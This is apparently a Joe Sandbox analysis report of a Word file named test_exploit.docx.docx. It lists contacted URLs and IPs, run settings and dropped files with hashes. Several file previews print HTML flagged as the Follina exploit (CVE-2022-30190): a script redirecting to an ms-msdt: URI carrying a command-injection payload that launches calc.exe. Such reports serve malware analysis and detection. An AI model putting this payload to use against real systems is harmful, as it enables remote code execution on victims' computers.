https://api.microsoftstream.com/api/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://cr.office.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	Avira URL Cloud: safe	low
https://portal.office.com/account/?ref=ClientMeControl	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://graph.ppe.windows.net	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://officeci.azurewebsites.net/api/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://store.office.cn/addinstemplate	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://api.aadrm.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://globaldisco.crm.dynamics.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://messaging.engagement.office.com/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://dev0-api.acompli.net/autodetect	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://www.odwebp.svc.ms	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com/v2/feedback	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/groups	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://web.microsoftstream.com/video/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://dataservice.o365filtering.com/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://ncus.contentsync.	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
http://weather.service.msn.com/data.aspx	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://apis.live.net/v5.0/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://www.bbc.com/news/live/world-europe-60517447	exp[1].htm.0.dr	false		high
https://messaging.lifecycle.office.com/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://management.azure.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://outlook.office365.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://wus2.contentsync.	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://api.office.net	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://incidents.diagnosticssdf.office.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://entitlement.diagnostics.office.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://substrate.office.com/search/api/v2/init	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://outlook.office.com/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://outlook.office365.com/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://webshell.suite.office.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://substrate.office.com/search/api/v1/SearchHistory	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://management.azure.com/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://messaging.lifecycle.office.com/getcustommessage16	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://devnull.onenote.com	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://messaging.action.office.com/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://ncus.pagecontentsync.	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false	URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://messaging.office.com/	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
145.14.144.97	us-east-1.route-1.000webhost.awex.io	Netherlands		204915	AWEXUS	false
145.14.144.176	unknown	Netherlands		204915	AWEXUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	648185
Start date and time: 18/06/202217:05:40	2022-06-18 17:05:40 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 45s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	test_exploit.docx.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.expl.evad.winDOCX@5/15@2/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .docx Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 52.109.32.24, 52.109.88.38, 52.109.76.36, 52.109.88.39, 52.109.76.35, 52.109.12.21
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, config.edge.skype.com, europe.configsvc1.live.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:07:36	API Interceptor	14x Sleep call for process: splwow64.exe modified

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Microsoft Access Database
Category:	dropped
Size (bytes):	528384
Entropy (8bit):	0.4758735249060776
Encrypted:	false
SSDEEP:	384:SGfX96gxJCMy7l8SFzfZ0jGBQEqLFgW1NywtZ1ISu+hVZO4Fg:JfXhCH7lHjZG1xT1Ny/QI
MD5:	3816F838F20830B990F237B727EE63A1
SHA1:	0ABA7D334B6BE2C1592257FFBE9A88F6379E353E
SHA-256:	BAACD3AE88107DE6AE2D72853CC6441F5CA8C5DA1B6BDEEAE0462FCE776DD92C
SHA-512:	9C188AEDD5688F1F1548461F5C230444BD846B6F0B3BC99664122723FF7911812A4BF3EA25A9252A2E0D7F0E648FC60DA432B8FA3865F268C134044EE57A3291
Malicious:	false
Reputation:	low
Preview:	....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N<U.7...\|.(...`.:{6O...Z.Cu..3..y[(.\|*..\|.......JF:.f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	36
Entropy (8bit):	2.730660070105504
Encrypted:	false
SSDEEP:	3:5NixJlElGUR:WrEcUR
MD5:	1F830B53CA33A1207A86CE43177016FA
SHA1:	BDF230E1F33AFBA5C9D5A039986C6505E8B09665
SHA-256:	EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
SHA-512:	502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.3742409383951601
Encrypted:	false
SSDEEP:	3:VdNaV:VdNu
MD5:	76520E9EBD05C7CFB4E4E92AAB77B299
SHA1:	83E5CA4C7049326301F268C98EC22CC09BD15092
SHA-256:	8254A0E60234E6D14DBF463FCFE30D1F085DC3681D3EB1796EFF56C113AE1279
SHA-512:	6503C1E3A3F4D9F88FAE52B2A436445791F139CA05FCF3B455D4C9A06A45F059B1FF57131A4080B5F206853F8F6E506526D784D81D9F0A038420B2C75551AE93
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	813848. Admin.

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\162E0FB2-22FE-47A8-BEDD-0137327DF29A

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	148957
Entropy (8bit):	5.35671177129343
Encrypted:	false
SSDEEP:	1536:gcQW/gxgB5BQguw5/Q9DQC+zQWk4F77nXmvid3Xx4ETLKz6e:TJQ9DQC+zPXLI
MD5:	8F5FC7AD6DFF56A997648E19B1A3246B
SHA1:	CCEDAB1CC236414F48EECB9F4C6B1334492C68BA
SHA-256:	D1B5099F2E5F21FD63B0184075045CA55FA9DAADD6558DE0011A17411722B686
SHA-512:	164225290108462D1193BF2AAA3BBA6D446E22C856DE153D578CE4BA0EE3554F268C534D86380E41BB95FB7E3148789E15F7600410B72E083F8D59188AF094C8
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-18T15:06:52">.. Build: 16.0.15414.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\27C32ABB.htm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	5.429612650770164
Encrypted:	false
SSDEEP:	24:hP+3rIdlFXS8CbM60VM6U2nafNb++Z7LrtsKfAxCtGJ:t+3rIdjKT3FfNBhU
MD5:	19EF3736867C133098F4E4D7FE6A5D36
SHA1:	07730F94E02B06699B8B9B8CD822E9850459D5E8
SHA-256:	D69A3B887DD2D6AB25FC29199E1E7FFFF75E3A68AEBF060F99D2F5DE6D29F778
SHA-512:	A2C469738380E8FC81132579744645D6CA21A41C4ED3C5E24484A5D0A886B59983CF92411A65556019EE5F833DD8E4DC6960530B87690084A0292EC971A8FA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\27C32ABB.htm, Author: Joe Security
Reputation:	low
Preview:	<!DOCTYPE html>..<html>..<head>..</head>..<body>..<script>...window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../../../../../../../.exe IT_AutoTroubleshoot=ts_AUTO\"";..</script>..<style>.footer,.generic-footer{margin-bottom:98px}@media (min-width:374px){.footer,.generic-footer{margin-bottom:78px}}@media (min-width:546px){.footer,.generic-footer{margin-bottom:56px}}@media (min-width:1055px){.footer,.generic-footer{margin-bottom:0}}.disclaimer{position:fixed;z-index:9999999;bottom:0;right:0;border-top:2px solid #ff5c62;text-align:center;font-size:14px;font-weight:400;background-color:#fff;padding:5px 10px 5px 10px}.disclaimer a:hover{text-decoration:underline}@media (min-width:1052px){.disclaimer{text-align:right;border-left:2px solid red;border-top-left-radius:10px}}@media (min-width:1920px){.disclaimer{width:60%}}</style><div class="disclaimer">We support Ukraine a

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\827D74FF.dat

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Targa image data - Map - RLE 5 x 65536 x 0 "\004"
Category:	dropped
Size (bytes):	52
Entropy (8bit):	1.8614575055208968
Encrypted:	false
SSDEEP:	3:Vm1olpUktK0Xg/lrll0:MW6kK0XgtI
MD5:	07FFEFF17A8A1A1209AB3C2690D569D4
SHA1:	37CB513FABDDCDBBAA2E7296B31A4BC9832E1B01
SHA-256:	57CFA30BB860B95B7012ED62427025959B671D270AAF67FC406FBC3C4F3C48D4
SHA-512:	743591E7BFE9936EEE057C9D1769595D48C90BA28057D8EBD0F7299B8FCACD7B8FA50AF30BD0B8B6E09F77ADE16B47D6F0ABB079D60E975443A57C514099AD86
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBBF4665.htm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	5.429612650770164
Encrypted:	false
SSDEEP:	24:hP+3rIdlFXS8CbM60VM6U2nafNb++Z7LrtsKfAxCtGJ:t+3rIdjKT3FfNBhU
MD5:	19EF3736867C133098F4E4D7FE6A5D36
SHA1:	07730F94E02B06699B8B9B8CD822E9850459D5E8
SHA-256:	D69A3B887DD2D6AB25FC29199E1E7FFFF75E3A68AEBF060F99D2F5DE6D29F778
SHA-512:	A2C469738380E8FC81132579744645D6CA21A41C4ED3C5E24484A5D0A886B59983CF92411A65556019EE5F833DD8E4DC6960530B87690084A0292EC971A8FA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBBF4665.htm, Author: Joe Security
Preview:	<!DOCTYPE html>..<html>..<head>..</head>..<body>..<script>...window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../../../../../../../.exe IT_AutoTroubleshoot=ts_AUTO\"";..</script>..<style>.footer,.generic-footer{margin-bottom:98px}@media (min-width:374px){.footer,.generic-footer{margin-bottom:78px}}@media (min-width:546px){.footer,.generic-footer{margin-bottom:56px}}@media (min-width:1055px){.footer,.generic-footer{margin-bottom:0}}.disclaimer{position:fixed;z-index:9999999;bottom:0;right:0;border-top:2px solid #ff5c62;text-align:center;font-size:14px;font-weight:400;background-color:#fff;padding:5px 10px 5px 10px}.disclaimer a:hover{text-decoration:underline}@media (min-width:1052px){.disclaimer{text-align:right;border-left:2px solid red;border-top-left-radius:10px}}@media (min-width:1920px){.disclaimer{width:60%}}</style><div class="disclaimer">We support Ukraine a

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\ED025776.wmf

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	74
Entropy (8bit):	2.117514616373907
Encrypted:	false
SSDEEP:	3:t/Wlsl81olpUktK0Xg/lrll0:t/d8W6kK0XgtI
MD5:	C4E6B3035AC3828D375E5479E8485D0D
SHA1:	624B2E68B669293CE5EF5EDA4EFCFDE97FFEA84A
SHA-256:	591890CBBED60EF32252835A3F13362E9204F1088E5EFA9E164A3526B612C4D7
SHA-512:	1864A7CBF1C5205F0D1CAC9DA5CA4E8F103B9C045913A98B8A9DA62B3850AB842913235BF38DA6C7D78ECE985D35EBC8F6C15471B5C2FE23A6A4BBF66A03E4DB
Malicious:	false
Preview:	.............`.....qW....................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\exp[1].htm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	1330
Entropy (8bit):	5.429612650770164
Encrypted:	false
SSDEEP:	24:hP+3rIdlFXS8CbM60VM6U2nafNb++Z7LrtsKfAxCtGJ:t+3rIdjKT3FfNBhU
MD5:	19EF3736867C133098F4E4D7FE6A5D36
SHA1:	07730F94E02B06699B8B9B8CD822E9850459D5E8
SHA-256:	D69A3B887DD2D6AB25FC29199E1E7FFFF75E3A68AEBF060F99D2F5DE6D29F778
SHA-512:	A2C469738380E8FC81132579744645D6CA21A41C4ED3C5E24484A5D0A886B59983CF92411A65556019EE5F833DD8E4DC6960530B87690084A0292EC971A8FA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\exp[1].htm, Author: Joe Security Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\exp[1].htm, Author: Joe Security
IE Cache URL:	https://samisoooo.000webhostapp.com/exp.html
Preview:	<!DOCTYPE html>..<html>..<head>..</head>..<body>..<script>...window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../../../../../../../.exe IT_AutoTroubleshoot=ts_AUTO\"";..</script>..<style>.footer,.generic-footer{margin-bottom:98px}@media (min-width:374px){.footer,.generic-footer{margin-bottom:78px}}@media (min-width:546px){.footer,.generic-footer{margin-bottom:56px}}@media (min-width:1055px){.footer,.generic-footer{margin-bottom:0}}.disclaimer{position:fixed;z-index:9999999;bottom:0;right:0;border-top:2px solid #ff5c62;text-align:center;font-size:14px;font-weight:400;background-color:#fff;padding:5px 10px 5px 10px}.disclaimer a:hover{text-decoration:underline}@media (min-width:1052px){.disclaimer{text-align:right;border-left:2px solid red;border-top-left-radius:10px}}@media (min-width:1920px){.disclaimer{width:60%}}</style><div class="disclaimer">We support Ukraine a

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exp[1].htm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	5.429612650770164
Encrypted:	false
SSDEEP:	24:hP+3rIdlFXS8CbM60VM6U2nafNb++Z7LrtsKfAxCtGJ:t+3rIdjKT3FfNBhU
MD5:	19EF3736867C133098F4E4D7FE6A5D36
SHA1:	07730F94E02B06699B8B9B8CD822E9850459D5E8
SHA-256:	D69A3B887DD2D6AB25FC29199E1E7FFFF75E3A68AEBF060F99D2F5DE6D29F778
SHA-512:	A2C469738380E8FC81132579744645D6CA21A41C4ED3C5E24484A5D0A886B59983CF92411A65556019EE5F833DD8E4DC6960530B87690084A0292EC971A8FA35
Malicious:	false
Preview:	<!DOCTYPE html>..<html>..<head>..</head>..<body>..<script>...window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../../../../../../../.exe IT_AutoTroubleshoot=ts_AUTO\"";..</script>..<style>.footer,.generic-footer{margin-bottom:98px}@media (min-width:374px){.footer,.generic-footer{margin-bottom:78px}}@media (min-width:546px){.footer,.generic-footer{margin-bottom:56px}}@media (min-width:1055px){.footer,.generic-footer{margin-bottom:0}}.disclaimer{position:fixed;z-index:9999999;bottom:0;right:0;border-top:2px solid #ff5c62;text-align:center;font-size:14px;font-weight:400;background-color:#fff;padding:5px 10px 5px 10px}.disclaimer a:hover{text-decoration:underline}@media (min-width:1052px){.disclaimer{text-align:right;border-left:2px solid red;border-top-left-radius:10px}}@media (min-width:1920px){.disclaimer{width:60%}}</style><div class="disclaimer">We support Ukraine a

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	96
Entropy (8bit):	4.486544503749612
Encrypted:	false
SSDEEP:	3:bDuMJlJ9bJKMbAKLFSmxWaNJKMbAKLFSv:bCCbXbhLFrXbhLFc
MD5:	DD6F71B2F95C3B70AB8ED57DF8A0AE24
SHA1:	9230132450FAAB426AAE65F3EEC606B831C993EF
SHA-256:	CAC40AB49DA9DEAC1952EDDABA44A147593BB66782493C26C73008050D5FF245
SHA-512:	2D732B9EAF931A47019845500096028E5E77AB3985EFD8550C98D3AC12AEAC72386B855569AFDCAFFB380B6D40AD36AEA5ABB27E4C9500771FE345762F60203B
Malicious:	false
Preview:	[folders]..Templates.LNK=0..test_exploit.docx.docx.LNK=0..[misc]..test_exploit.docx.docx.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\test_exploit.docx.docx.LNK

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:45 2022, mtime=Sat Jun 18 23:07:08 2022, atime=Sat Jun 18 23:06:48 2022, length=13714, window=hide
Category:	dropped
Size (bytes):	1095
Entropy (8bit):	4.640977963114388
Encrypted:	false
SSDEEP:	12:8sVlUEuElPCH2HBmY88VvX+WRIxKfDRlmWyjAW/UyXPl/dW0NDldDS5e4t2Y+xI/:8CB+wfNlmpAWMyPf3DHWI7aB6m
MD5:	792DB737C1D5C939C510B6507FF831EE
SHA1:	D968223C36569087ABB35E586757E4714AE23712
SHA-256:	9A4FF58C1FF16A1182FBB56850FEB00DF6F9AEBEEAC6CF0C19F374A051E95BCA
SHA-512:	E9CE6925DDDEA4A53F7D1F0C0AE8943312C284B83FD9C374AAA8971AD1F25CD5D540679B4ABC8950D76068B4B8E29C5BFAE474C892E3A6F6FE7944C6CD476658
Malicious:	false
